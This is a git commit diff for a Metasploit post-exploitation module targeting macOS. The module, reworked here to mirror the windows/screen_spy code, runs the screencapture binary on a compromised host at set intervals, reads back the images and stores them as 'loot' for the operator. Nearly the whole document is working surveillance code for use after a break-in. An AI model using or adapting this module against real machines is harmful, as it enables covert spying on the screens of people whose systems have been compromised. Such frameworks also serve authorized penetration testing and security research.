Modified module to use windows/screen_spy code
Peter Toth
parent
3fdaf4de94
commit
92da6760ef
|
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
|
||||||
[true, 'File format to use when saving a snapshot', 'png', %w(png gif)]
|
[true, 'File format to use when saving a snapshot', 'png', %w(png gif)]
|
||||||
),
|
),
|
||||||
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds. 0 for no delay', 10]),
|
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds. 0 for no delay', 10]),
|
||||||
OptInt.new('COUNT', [true, 'Number of screenshots to collect. 0 for no count', 1]),
|
OptInt.new('COUNT', [true, 'Number of screenshots to collect.', 1]),
|
||||||
OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/tmp/random']),
|
OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/tmp/random']),
|
||||||
OptString.new('EXE_PATH', [true, 'Path to remote screencapture executable', '/usr/sbin/screencapture'])
|
OptString.new('EXE_PATH', [true, 'Path to remote screencapture executable', '/usr/sbin/screencapture'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
@ -40,71 +40,43 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
host = session.session_host
|
||||||
|
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"
|
||||||
|
file_type = datastore['FILETYPE'].shellescape
|
||||||
tmp_path = datastore['TMP_PATH'].shellescape.gsub('random', Rex::Text.rand_text_alpha(8))
|
tmp_path = datastore['TMP_PATH'].shellescape.gsub('random', Rex::Text.rand_text_alpha(8))
|
||||||
execute("Create remote temp dir: ", "mkdir -p #{tmp_path}")
|
|
||||||
if datastore['COUNT'] == nil
|
begin
|
||||||
count = 1
|
|
||||||
else
|
|
||||||
count = datastore['COUNT']
|
count = datastore['COUNT']
|
||||||
end
|
|
||||||
if count == 0
|
|
||||||
begin
|
|
||||||
get_screenshot("Screenshot", tmp_path, "screenshot.#{datastore['FILETYPE'].shellescape}")
|
|
||||||
delay
|
|
||||||
end until false
|
|
||||||
else
|
|
||||||
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds"
|
||||||
# calculate a sane number of leading zeros to use. log of x is ~ the number of digits
|
# calculate a sane number of leading zeros to use. log of x is ~ the number of digits
|
||||||
leading_zeros = Math::log10(count).round
|
leading_zeros = Math::log10(count).round
|
||||||
|
file_locations = []
|
||||||
count.times do |num|
|
count.times do |num|
|
||||||
if count == 1
|
select(nil, nil, nil, datastore['DELAY'])
|
||||||
msg = "Screenshot"
|
begin
|
||||||
else
|
# This is an OSX module, so mkdir -p should be fine
|
||||||
msg = "Screenshot %0#{leading_zeros}d/#{count}" % (num+1)
|
cmd_exec("mkdir -p #{tmp_path}")
|
||||||
|
filename = Rex::Text.rand_text_alpha(7)
|
||||||
|
file = tmp_path + "/" + filename
|
||||||
|
cmd_exec(datastore['EXE_PATH'].shellescape + " -C -t " + datastore['FILETYPE'].shellescape + " " + file)
|
||||||
|
data = read_file(file)
|
||||||
|
rescue RequestError => e
|
||||||
|
print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
if data
|
||||||
|
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
|
||||||
|
fn = "screenshot.%0#{leading_zeros}d.#{file_type}" % num
|
||||||
|
file_locations << store_loot("screen_capture.screenshot", "image/#{file_type}", session, data, fn, "Screenshot")
|
||||||
end
|
end
|
||||||
get_screenshot(msg, tmp_path, "screenshot_%0#{leading_zeros}d.#{datastore['FILETYPE'].shellescape}" % (num+1))
|
|
||||||
delay unless ((num+1) == count)
|
|
||||||
end
|
end
|
||||||
rescue IOError, Errno::ENOENT => e
|
rescue IOError, Errno::ENOENT => e
|
||||||
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
execute("Remove remote temp dir: ", "rmdir " + tmp_path)
|
print_status("Screen Capturing Complete")
|
||||||
end
|
if file_locations and not file_locations.empty?
|
||||||
|
print_status "run loot -t screen_capture.screenshot to see file locations of your newly acquired loot"
|
||||||
def get_screenshot(msg, tmp_path, local_filename)
|
|
||||||
filename = Rex::Text.rand_text_alpha(7) + "." + datastore['FILETYPE'].shellescape
|
|
||||||
file = tmp_path + "/" + filename
|
|
||||||
|
|
||||||
execute("Save screenshot to remote temp folder:", datastore['EXE_PATH'].shellescape + " -C -t " + datastore['FILETYPE'].shellescape + " " + file)
|
|
||||||
data = cat_file(file)
|
|
||||||
loot_file = save(msg, data, local_filename)
|
|
||||||
execute("Remove remote temp file:", "rm " + file)
|
|
||||||
end
|
|
||||||
|
|
||||||
def delay
|
|
||||||
if datastore['DELAY'] != nil && datastore['DELAY'] != 0
|
|
||||||
vprint_status("Delaying for " + datastore['DELAY'].to_s() + " seconds")
|
|
||||||
Rex.sleep(datastore['DELAY'])
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def save(msg, data, filename, ctype="image/" + datastore['FILETYPE'])
|
|
||||||
ltype = "osx.screenshot"
|
|
||||||
loot_file = store_loot(ltype, ctype, session, data, filename, 'Screenshot')
|
|
||||||
print_good("#{msg} stored in #{loot_file.to_s}")
|
|
||||||
end
|
|
||||||
|
|
||||||
def execute(msg, cmd)
|
|
||||||
vprint_status("#{msg} #{cmd}")
|
|
||||||
output = cmd_exec(cmd)
|
|
||||||
return output
|
|
||||||
end
|
|
||||||
|
|
||||||
def cat_file(filename)
|
|
||||||
vprint_status("Downloading screenshot: #{filename}")
|
|
||||||
data = read_file(filename)
|
|
||||||
return data
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue